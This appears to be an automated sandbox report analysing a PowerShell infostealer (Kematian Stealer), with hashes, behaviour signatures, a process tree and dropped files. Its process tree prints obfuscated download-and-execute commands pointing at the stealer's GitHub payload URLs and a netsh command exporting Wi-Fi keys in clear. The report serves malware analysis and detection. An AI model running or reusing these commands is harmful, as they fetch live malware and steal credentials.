Analysis

  • max time kernel
    260s
  • max time network
    262s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30-06-2024 13:57

General

  • Target

    kdot.ps1

  • Size

    72KB

  • MD5

    f0ec57b428d8920b0d55742f44b6fb98

  • SHA1

    af6a3967a8614d3e88244f357f17d262f6d92eac

  • SHA256

    c1017e89be9f91e52419ccddb94151014860e25ea6644138cdae8d3f89aedbad

  • SHA512

    dedab534f7fcac52fe543ea26f3e9450c0c4e73d17ab3810ab8f66fb3f7c51114c4242d6f78ac6266561be21ab27555245c736c0d6930f5a3effa4eb22d8acf7

  • SSDEEP

    1536:Y8SdVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLrJS7srHX6Cx:Y8SdVn5Uwiv/5IQo8l01zhw5hUr9KCx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\kdot.ps1
    1⤵
    • Blocklisted process makes network request
    • Drops file in Drivers directory
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:204
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vtzq0l2a\vtzq0l2a.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2068
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C92.tmp" "c:\Users\Admin\AppData\Local\Temp\vtzq0l2a\CSC3DAC89D66D30437FAD4D84C7DBA1444A.TMP"
        3⤵
          PID:1564
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
        2⤵
          PID:68
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
          2⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3868
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrdqiaje\xrdqiaje.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:972
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9CA.tmp" "c:\Users\Admin\AppData\Local\Temp\xrdqiaje\CSC98BE672816744AD7ABFD6E603C118F59.TMP"
              4⤵
                PID:3876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
            2⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2224
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kfzz5i2e\kfzz5i2e.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:508
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF29.tmp" "c:\Users\Admin\AppData\Local\Temp\kfzz5i2e\CSC636196E4F0F040D8AC9AA0BA31955B90.TMP"
                4⤵
                  PID:3808
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1a3fvp12\1a3fvp12.cmdline"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1108
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB7E.tmp" "c:\Users\Admin\AppData\Local\Temp\1a3fvp12\CSC75200B0971F94726A6BE9743A09B4F8E.TMP"
                3⤵
                  PID:3856

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              900713b658f108100bb7aa144134dbca

              SHA1

              7a05dd4d5cd03542c5187c8a3036f30b9d79daf0

              SHA256

              c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8

              SHA512

              85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              6e0466f6f6e07ed77dbf9a7594fdd6e0

              SHA1

              512491941bf6c64125726b0ec64e212db5871bed

              SHA256

              3a500046c8b18deaad81009711c4544e1c725a3b1509faf57e4be7457eceb6f3

              SHA512

              a5cf59207704bf6369a8c68ad34bc1d831f0e4fda2de9d9c05e7f9696eef3c8579aa2d3c9a19d9a966011f6a530cc13e5926ec6144d22565997cad3b3c41da93

            • C:\Users\Admin\AppData\Local\Temp\1a3fvp12\1a3fvp12.dll

              Filesize

              3KB

              MD5

              4c35f8bf1cfa7b99dc0406387bd38fdd

              SHA1

              27686f12593aa35ce3115dd10eeec1ad773c91ae

              SHA256

              c4e7ca9ac07cef358beb425ddf4937c88d3c95c4f94c7c56c3c2f1aade5f32c1

              SHA512

              3927eef794d4b4f554b256473cc4503efd1ab9e21c6673d81cbb1caf80c6ef37e3c5508e1ca3234ce50de24597233cb5ad4a78a499eda24fe0971bc00ea3e08b

            • C:\Users\Admin\AppData\Local\Temp\RES7C92.tmp

              Filesize

              1KB

              MD5

              46e31416e69f05771769b31aab918b3e

              SHA1

              bdbea9012b656db94da09cd290d5439ce9077292

              SHA256

              12b93114e2cdd5a5899a44bd29f370510d2342d4e168ca2b72ce1e4a694b9a6f

              SHA512

              ee8dbb7c8d3a439220990fa10b4aeabe86f8c79fccb8c68bd8a30a3ac226a07fcb476bdbd17e7332f9e5e041d02edde96815dcfc686cae3da4e251e0589b88c4

            • C:\Users\Admin\AppData\Local\Temp\RESB9CA.tmp

              Filesize

              1KB

              MD5

              df31c24f03b4a148e58aaeb267f14396

              SHA1

              1bbec08275f38a788200e37ef78f6d7dcba6e4d8

              SHA256

              433ba285cc346c516c328ee13b969dbc84204f5936702d9b7bfecf6809058874

              SHA512

              b59a1d48c75ecbdec86503161d133ebedb2611d89fcdc10f03001112e48e85f00a0d264bedf29acfc048475575179914914d106a1718ff908c83975a2282a6b2

            • C:\Users\Admin\AppData\Local\Temp\RESBF29.tmp

              Filesize

              1KB

              MD5

              c8fbbac18ceb1e8acca0da65314ad543

              SHA1

              e51ae36f90c3eabe409e5c7353d974b90e3f63f7

              SHA256

              bc5171c7bdbaeb7e3bc03b0c44739aeffa8ad581f761dc910d18b0ae221ede62

              SHA512

              690d126ec661a9cabc1b152a0cae1b4db3ea6945366e7cf31b8b8e751f20fbd67297ccc9b0a958e5ac85ada53498bd377adfa7535b5291c7a9794674ee308540

            • C:\Users\Admin\AppData\Local\Temp\RESCB7E.tmp

              Filesize

              1KB

              MD5

              76f5b11e93e95e8b0ed0fdedfe4ccac1

              SHA1

              3251cc315f93f96cb2a57e3a3023c5008fba2eb4

              SHA256

              a2e7dd2081dc4f811a5244d9fdccb2d5011de7abd3f4b5bba867883bf42daa7d

              SHA512

              a8303d8db52f32dbb28f35498c104a01c162911ddab900a395c2dcff5f0d97ecbe7b83d56391c804d9cbd8e0b7f497e6d3a5458d4f186943329a042fd15ada54

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ox5it45p.vbu.ps1

              Filesize

              1B

              MD5

              c4ca4238a0b923820dcc509a6f75849b

              SHA1

              356a192b7913b04c54574d18c28d46e6395428ab

              SHA256

              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

              SHA512

              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            • C:\Users\Admin\AppData\Local\Temp\cards.json

              Filesize

              4B

              MD5

              37a6259cc0c1dae299a7866489dff0bd

              SHA1

              2be88ca4242c76e8253ac62474851065032d6833

              SHA256

              74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b

              SHA512

              04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f

            • C:\Users\Admin\AppData\Local\Temp\kfzz5i2e\kfzz5i2e.dll

              Filesize

              4KB

              MD5

              21eed94a1355fb4af180a2f5b0d7d10a

              SHA1

              d282d63337526ffdeed002b9217dce03f9ff9009

              SHA256

              6dd2910d797a8ea778ed3f08365b3623e66553cdb2924c427118fe934bda2d5e

              SHA512

              ab2a187b2b43d50dd218e5d601a494da171d29ee74c1027c7733a0b1f77cba2e9f57f2e1a45972e1756c7f4c51437448b1b72a0c634714d4cf7fbe081be7102b

            • C:\Users\Admin\AppData\Local\Temp\vtzq0l2a\vtzq0l2a.dll

              Filesize

              3KB

              MD5

              04e491d8a341fb83fda23bdbc6ea79c3

              SHA1

              a6df0b7096d0e76bfb51d3d377e28e05853113cd

              SHA256

              8b408cb6e91fcde70e9ddb60686172155869bc4a40a0f22d4cf878d1d451bee9

              SHA512

              cfba3d1158e75040d88ea003f0a1a7b6dca5d4cb9018a43f638d297e896a600d5ebb5b934d3a20e266a0c434911429924bcb43462fb5f52d12214aa366ead40d

            • C:\Users\Admin\AppData\Local\Temp\xrdqiaje\xrdqiaje.dll

              Filesize

              5KB

              MD5

              0df21b8e1847eb387724932b156e4c02

              SHA1

              610265ae5b0c7a6a1f5a2a40d9319943a13bbeb2

              SHA256

              80402bb13de1ef4bb7ac0f37c24e91fa46236567f1368de735b941cf7562c510

              SHA512

              6ddab04ae201270a7b2eec6edb3d0ebde347ad379d44f8bbdab7a890c3367b4244a2f74dff2cdf59b9f01e61f8162c9b8772fd4e7b770c5a2e8f5c5c5da8c26a

            • C:\Users\Admin\AppData\Roaming\Kematian\GB-(NDTNZVHN)-(2024-06-30)-(UTC0)\DomainDetects\Chrome.txt

              Filesize

              2B

              MD5

              81051bcc2cf1bedf378224b0a93e2877

              SHA1

              ba8ab5a0280b953aa97435ff8946cbcbb2755a27

              SHA256

              7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

              SHA512

              1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

            • \??\c:\Users\Admin\AppData\Local\Temp\1a3fvp12\1a3fvp12.0.cs

              Filesize

              321B

              MD5

              249ab1409c1ad0e025a82d513e4f7f12

              SHA1

              f38f701e2e6be38739f36d04586f90f39babf2ad

              SHA256

              9babf0e0294d1743f12c4fb3ddac50ca25c75accd223c4f1716d916f659c538c

              SHA512

              3abcdec5ed668a291dde15344368549174d2562196285a3f521613c7bd3b1ab80f189439b08e7c4f57c5269f6159aa154c0cc503df3640bfc51712635c3a12bc

            • \??\c:\Users\Admin\AppData\Local\Temp\1a3fvp12\1a3fvp12.cmdline

              Filesize

              369B

              MD5

              f55e29476d3d6cd8dc967b700f546c24

              SHA1

              27a397eb904d8b3879648ed8f1c6c3385ef5d373

              SHA256

              39a63374c3c30f8e1e96dae13e0d16187aa037fde0e7a0cee251c6e3ffc3c70d

              SHA512

              e9c4025a677db8016195c348a3690aec63995fa9039268defe5efa2ab74b4b99e79ec83810cdd172fc8b2adb35ac1feb1c680145c5505c1807f6c067e41329ac

            • \??\c:\Users\Admin\AppData\Local\Temp\1a3fvp12\CSC75200B0971F94726A6BE9743A09B4F8E.TMP

              Filesize

              652B

              MD5

              adbbd6c1e35db307e2f43fe88ffc9337

              SHA1

              55cd43623c1038bc799dbcd444c00b833eed2435

              SHA256

              6cebe6d2970c75ade40509e8f6218debc8152a9bba9c12583328a73098c45c9b

              SHA512

              c361983139205aa2370be0b8315e8079c619a6f2bf3b61b96e6864570fdb9b48a16ed420ab3a444c5abd3f9f0dba5691353b362a246fb59a3d14a565936098a3

            • \??\c:\Users\Admin\AppData\Local\Temp\kfzz5i2e\CSC636196E4F0F040D8AC9AA0BA31955B90.TMP

              Filesize

              652B

              MD5

              90aa20a3fcd63afc498f8e1191df59c2

              SHA1

              c6f6b93b4019e77b66ad9fde2d3db7f5892ff36e

              SHA256

              2bfec43b75e07823460e07f31f752c0ffd02b4d20d3de3d6e0753b548a672d64

              SHA512

              d29aba85d0e8ed6ecf7437c07b4006e5c6ec6435f28f34beea277ec8750082ce2e9ba548d2d8ec6f86ce914186aab1c5ce0a6d0c601977bca938d794538575f1

            • \??\c:\Users\Admin\AppData\Local\Temp\kfzz5i2e\kfzz5i2e.0.cs

              Filesize

              1KB

              MD5

              6cd5b22aff0ac340cba788be54877f27

              SHA1

              a799f3c293f1a515f71b71a45636a60f5dea1600

              SHA256

              c6b7a8f6456604d8b62fcd727ec0e1f9bff262b4b6d88418d343573b0e39abc1

              SHA512

              44efcff35378d1658f196268210d177982c8ccd1880003f1ddcb2d48e640b22170354b5849e23e678b6c3252c5cc12eb6ff123809d3052f7ab8aba7d7173f5ae

            • \??\c:\Users\Admin\AppData\Local\Temp\kfzz5i2e\kfzz5i2e.cmdline

              Filesize

              369B

              MD5

              6dc0fa8f8beccb25e1fa1591e72b2a5a

              SHA1

              3ce34591c861ebbe06088b4572f71de2e4dc8c33

              SHA256

              c02f57b39169b1d0935b3ac85e3e997d7df38dd51c1cd5c8505ef204f2e40010

              SHA512

              71f1a60afbddd80b8fd7bb5fa68482ef221cfd9349d90157fa51bc436195693c910ce69019c77c41ed5ac16a0a6d88dcfb1f9f9a6b8a9dc0ad32b1559242db35

            • \??\c:\Users\Admin\AppData\Local\Temp\vtzq0l2a\CSC3DAC89D66D30437FAD4D84C7DBA1444A.TMP

              Filesize

              652B

              MD5

              d91ac402be42f8615bbf2cd4daa9f284

              SHA1

              5be288c867c4baa16ad61e0d932d0e82af79fbe5

              SHA256

              27d703f77001efea6141d9d7acaa49508d195865df0144bf2e03cc82f011972a

              SHA512

              f5bbb4d039dc98f1c94ea3bfd8ddfcc702c2abc94d99fa2407986e39a8c57da850c33c99474411063cdf8a850c533d2f7c45fe561145e00f723537b18618f228

            • \??\c:\Users\Admin\AppData\Local\Temp\vtzq0l2a\vtzq0l2a.0.cs

              Filesize

              512B

              MD5

              a36c5dbd22147371b4ea6ffacb560fb6

              SHA1

              e7248cd6a49d3aae9439efdffaceeacad6a7c523

              SHA256

              fc874c6cbd59c24e83702e0cd6f301c4a929865687d8e0d041090a2bcd801a60

              SHA512

              256b2e0beea6305f21024d60acdb0dcc84c2da46824d1c0610a9a22fa0e8c1753271140db278baf26e260c381f13001be1e8c651b01a178ca0922a2ab1bf4361

            • \??\c:\Users\Admin\AppData\Local\Temp\vtzq0l2a\vtzq0l2a.cmdline

              Filesize

              369B

              MD5

              3132117c96ed6e72394a3dfa3bb4287a

              SHA1

              1013a530baa1b3a0ffdcec5d3ec8dcaae3062459

              SHA256

              79863b6466b146643d21feeac0e89a87a62f96c2cdca9fd3e5ede6e867d861fe

              SHA512

              f55ea554a0e759bce5eb4c8d99bfc89f4fd094728150bc32baca02c2380898513e277ccb14e2871a1b44b9c82b07aa0e0e605ce62d4697cbdbee88e48a802e89

            • \??\c:\Users\Admin\AppData\Local\Temp\xrdqiaje\CSC98BE672816744AD7ABFD6E603C118F59.TMP

              Filesize

              652B

              MD5

              30af0e03d8960d7f879805d954e0b1d7

              SHA1

              8709c700306797ef7603340de6a1d5b4a6e3608e

              SHA256

              f87af91358283b3519c196007c54cf393a25c11c93d88fec252931eb2412d185

              SHA512

              e25cb86b0fbae673fab41a75314354d07d13609836d5c1a6e6645bbd7bc9debb25785a0e70ca6b04e906f5a8f4ef4534f29609aa7675f386745604090c7623db

            • \??\c:\Users\Admin\AppData\Local\Temp\xrdqiaje\xrdqiaje.0.cs

              Filesize

              4KB

              MD5

              2a829317f65fea84eb85cb2376fa9e21

              SHA1

              2f223ea8738f9989385e93b9c8cf0e8fc5e30700

              SHA256

              f99c46f447010a438586651fcdf9068394926247bf7656980fee066b2069fe8f

              SHA512

              a438c35327297431df19fe50683619f78ea0245bb8d3aa7553c376c365b927747d8cb8343fc2cfb4de884dad4eb6166589afc98eba385137bb3405998838ace0

            • \??\c:\Users\Admin\AppData\Local\Temp\xrdqiaje\xrdqiaje.cmdline

              Filesize

              712B

              MD5

              bfd799b6e9e149a66be2ad629c5ade26

              SHA1

              6911998997406ef77deb0439730fd8e32cfe7596

              SHA256

              cdd35be3d25b77515881fc2e94069643035e795b4225e131651ab2407fd1e498

              SHA512

              86ab48da18a41afae6f76d9f0142a912d0c930b385b5fb8ff223942e7a30470645abb7297eed64eb43209c631630d3bde0d9bbf890c0728f3ed5b9eac0975579

            • memory/204-167-0x000001D6FB8D0000-0x000001D6FBDF6000-memory.dmp

              Filesize

              5.1MB

            • memory/204-615-0x00007FFA9F7A3000-0x00007FFA9F7A4000-memory.dmp

              Filesize

              4KB

            • memory/204-166-0x000001D6FB1D0000-0x000001D6FB392000-memory.dmp

              Filesize

              1.8MB

            • memory/204-136-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-596-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-725-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-698-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-111-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-371-0x000001D6FB030000-0x000001D6FB052000-memory.dmp

              Filesize

              136KB

            • memory/204-97-0x000001D6E01D0000-0x000001D6E01D8000-memory.dmp

              Filesize

              32KB

            • memory/204-3-0x00007FFA9F7A3000-0x00007FFA9F7A4000-memory.dmp

              Filesize

              4KB

            • memory/204-724-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-352-0x000001D6FB030000-0x000001D6FB05A000-memory.dmp

              Filesize

              168KB

            • memory/204-6-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-663-0x000001D6F8E80000-0x000001D6F8E92000-memory.dmp

              Filesize

              72KB

            • memory/204-676-0x000001D6F8E20000-0x000001D6F8E2A000-memory.dmp

              Filesize

              40KB

            • memory/204-436-0x000001D6F8E40000-0x000001D6F8E7C000-memory.dmp

              Filesize

              240KB

            • memory/204-380-0x000001D6FAF30000-0x000001D6FAFFC000-memory.dmp

              Filesize

              816KB

            • memory/204-10-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

              Filesize

              9.9MB

            • memory/204-9-0x000001D6F8850000-0x000001D6F88C6000-memory.dmp

              Filesize

              472KB

            • memory/204-696-0x000001D6F8E10000-0x000001D6F8E18000-memory.dmp

              Filesize

              32KB

            • memory/204-5-0x000001D6F8720000-0x000001D6F8742000-memory.dmp

              Filesize

              136KB

            • memory/2224-609-0x00000202BEE30000-0x00000202BEE38000-memory.dmp

              Filesize

              32KB

            • memory/2224-624-0x00000202BF1D0000-0x00000202BF29C000-memory.dmp

              Filesize

              816KB

            • memory/3868-573-0x000002E7BABE0000-0x000002E7BACAC000-memory.dmp

              Filesize

              816KB

            • memory/3868-544-0x000002E7BA7C0000-0x000002E7BA7C8000-memory.dmp

              Filesize

              32KB